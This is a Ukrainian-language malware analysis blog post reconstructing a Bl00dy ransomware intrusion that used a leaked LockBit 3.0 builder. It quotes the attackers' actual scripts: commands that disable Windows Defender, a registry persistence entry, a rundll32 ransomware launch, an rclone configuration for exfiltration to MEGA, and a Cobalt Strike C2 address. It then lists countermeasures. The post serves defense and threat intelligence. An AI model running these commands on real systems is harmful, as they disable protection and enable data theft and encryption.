.bl00dy ransomware [UA]

(!) English version of this content can  be found here

 

Initial Access: N/A
Persistence: CobaltStrike, LOLbins
Credentials: LSASS Dump/PrivEscalation
Lateral: SMB, RDP
Exfil: rclone to mega
C2: CobaltStrike

Сьогодні (25.09.22) на аналіз було отримано вельми обмежену інформацію від однієї із українських жертв Bl00dy Ransomware Gang. На жаль, з наданих файлів не можливо встановити вектор втручання, часові рамки атаки та які операції були автоматизовані, а які проводилися в інтерактиві, проте інформації виявилося цілком достатньо для реконструкції схеми атаки.

https://twitter.com/tdatwja/status/1573776328486113281

Прошу ознайомитися і вжити відповідних заходів.

Коротка довідка:

Bl00dy ransomware gang – одне із угрупувань, що використовує тактику double extortion (крадуть і шифрують інформацію). Замість сайту з “стіною сорому” використовують Телеграм канал, де продають та/або публікують дані, якщо жертва відмовилась сплачувати викуп. Активна діяльність групи відстежується з липня поточного року. Детальніше (databreaches.net)

Вхідні дані:

Звернення жертви після виявлення факту спотворення файлів на одній із систем:

Реконструкція схеми атаки:

Виходячи з ransom note атрибуція нападників достатньо очевидна:

GREETINGS FROM BL00DY RANSOMWARE GANG
We download your company important files / documents / databases/ mails / accounts
We publish it to the public if you dont cooperate .
filedecryptionsupport@msgsafe.io
Telegram hall of shame , where all company private data will be PUBLISHED??
https://t.me/bl00dy_Ransomware_Gang

Але в той же час ID Ransomware пов’язує контактний email із Conti:

Враховуючи цікаву історію розпаду Conti та їх гучну операцію в Коста-Ріці, можна припустити, що таємниче угрупування #Bl00dy Ransomware Gang є одним із побічних проектів Conti, але перевіреної інформації, щоб підтвердити це поки немає.

update 26/09/22

З іншого боку, як влучно згадали @malwrhunterteam- раніше це угрупування використовувало Babuk, потім злитий Conti а тепер злитий LockBit

Тепер перейдемо до встановлення ролей кожного із наданих зразків:

logs.bat [c:\windows\temp\] – запуск шифрування через DLL

:rundll32 C:\LB3_ReflectiveDll_DllMain-cyt.dll,gdll

reg.txt – постановка задачі на активацію скрипта logs.bat до входу в систему

reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce” /v notepad /t REG_SZ /d “c:\windows\temp\logs.bat”

wddd4.bat [c:\] – деактивація та видалення Windows Defender

powershell -command “Add-MpPreference -ExclusionPath ‘C:\Windows\temp'”
powershell -command “Add-MpPreference -ExclusionExtension “.exe””
powershell -command “Add-MpPreference -ExclusionPath ‘C:\'”
powershell -command “Add-MpPreference -ExclusionExtension “.dll””
Uninstall-WindowsFeature -Name Windows-Defender
reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v DisableAntiVirus /t REG_DWORD /d 1 /f

pause

rclone.conf – конфігураційний файл rclone (інструмент передачі файлів)

[remote]
type = mega
user = filedecryptionsupport@msgsafe.io
pass = ********************************

veeamsvr.exe [?] – rclone замаскований під службу veeam

VT

wget.exe [?] – версія інструменту wget під ОС Windows

VT

wmware-1.log [c:\windows\temp\] – Cobalt Strike Beacon (payload)

VT / Intezer

C2: 185.170.42{.} 93:80/g.pixel

LB3_ReflectiveDll_DllMain-cyt.dll [c:\] – тіло ransomware захищене WinLicense

VT / Intezer

Статичний аналіз DLL ідентифікує LockBit 3.0 builder, який було злито в мережу буквально на минулому тижні.


Що одразу кидається  в очі? Використання c:\windows\temp\ замість профілю користувача та виклик файлів з кореню диску С: – звичайний користувач туди писати/звертатись не може. Це означає, що або було підняття прав через сам Cobalt Strike, або ж втручання було здійснено через проміжний хост, з якого отримали хеш паролю адміністратора (дамп LSASS/Mimikatz).

Якщо розставити скрипти та інструментарій  нападників у логічній послідовності, то отримаємо  такий стан системи перед початком шифрування:

  1. отримано віддалений контроль через запуск Cobalt Strike
  2. для доставки необхідних інструментів скористались wget
  3. крадіжка (upload) даних був здійснений через rclone на обліковий запис сервісу mega
  4. Windows Defender було деактивовано скриптом
  5. запуск шифрування був замаскований під обробку DLL, яка була ініційована вбудованим інструментом ОС reg через RunServicesOnce

Після завершення шифрування – файли спотворені, інформація викрадена, жертву очікує сплата викупу або ж оприлюднення вкраденого у каналі Телеграм.

У підсумку отримуємо наступний порядок активації скриптів та засобів наступний:

Контрзаходи:

  • Сувора фільтрація Web та Email на предмет нетипового та/або потенційно шкідливих файлів (макроси, скрипти і т.ін.)
  • Спеціальні політики (GPO/EPP) на заборону запуску вбудованих засобів ОС Windows (LOLBin)
  • Використання NGFW/IPS для блокування трафіку Cobalt Strike
  • Виявлення  та блокування команд rclone
  • Блокування доступу до популярних файлових сховищ (на рівні NGFW/Web Proxy), які не регламентовані для використання в організації (Mega, onedrive, fex etc)
  • Використання технологій типу Host IPS / Exploit Prevention для виявлення способів запуску/підгрузки сторонніх DLL
  • Контроль внесення змін до реєстру (заборона зміни стану автозапуску)
  • Використання РАМ для контролю за використанням облікових записів

Практичні поради:

Звіт справді не повний позаяк я мав справу лише з частиною артефактів і не мав можливості бачити журнали скомпрометованої ОС. Але ви повинні розуміти, що TTPs угрупувань на 90% автоматизовані, тому для перевірки політик ваших систем захисту нагадую базові речі:

Сподіваюсь ця інформація буде для вас вчасною та корисною.

Будьте здорові, уважні та обережні.
Вірте в ЗСУ.

Слава Україні.

#OptiData #InformationSecurity #Security
#Інформаційнабезпека #безпека #IOC #malware
#ransomware #bl00dy #cobaltstrike #rclone #DLL

VR

Tags: , , , , , , ,

About Vlad

My name is Vlad. From 2016 I am Technical Lead of OptiData team. I do implementation and support of Trellix (McAfee) solutions. I like dynamic malware analysis. Also I make education courses for our customers. pastebin.com/u/VRad slideshare.net/Glok17 VR

21 responses to “.bl00dy ransomware [UA]”

  1. Vlad says :

    English version of report available

    .bl00dy ransomware [EN]

    Like

Trackbacks / Pingbacks

  1. Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks - masterjitips - 28/09/2022
  2. Bl00dy ransomware gang started using leaked LockBit 3.0 builderSecurity Affairs - 28/09/2022
  3. Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks – TFun dot org - 28/09/2022
  4. Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks – My Blog - 28/09/2022
  5. Bl00dy ransomware gang began the use of leaked LockBit 3.0 builderSecurity Affairs - Firnco - 28/09/2022
  6. Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks – InfoSec Today - 28/09/2022
  7. Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks – Actu365 - 28/09/2022
  8. Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks - Shackle Media - 28/09/2022
  9. Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks | Webfingers Blog - 28/09/2022
  10. Bl00dy ransomware gang began utilizing leaked LockBit 3.0 builderSecurity Affairs - Securitycope - 29/09/2022
  11. Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks – Cyber Reports Cybersecurity News & Information - 29/09/2022
  12. The Week in Ransomware – September 30th 2022 – Emerging from the Shadows - Shackle Media - 01/10/2022
  13. The Week In Ransomware - September 30th 2022 - Trending Innovatives - 01/10/2022
  14. The Week in Ransomware - September 30th 2022 - Alvixo - 02/10/2022
  15. ランサムウェア週間 – 2022 年 9 月 30 日 – 影からの出現 - PRSOL:CC - 02/10/2022
  16. 「Bl00dy」ランサムウェア ギャングが攻撃に使用する LockBit 3.0 ビルダーが流出 - PRSOL:CC - 02/10/2022
  17. La semaine des ransomwares – 30 septembre 2022 – Sortir de l’ombre – BeIT System & Network security - 02/10/2022
  18. Update on LockBit ransomware and its place in the C2C - Shadownews - 04/10/2022
  19. The Week in Ransomware – September 30th 2022 – Emerging from the Shadows | wikinesia.net - Wikinesia.net - 05/02/2023
  20. Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks | wikinesia.net - Wikinesia.net - 06/02/2023

Leave a comment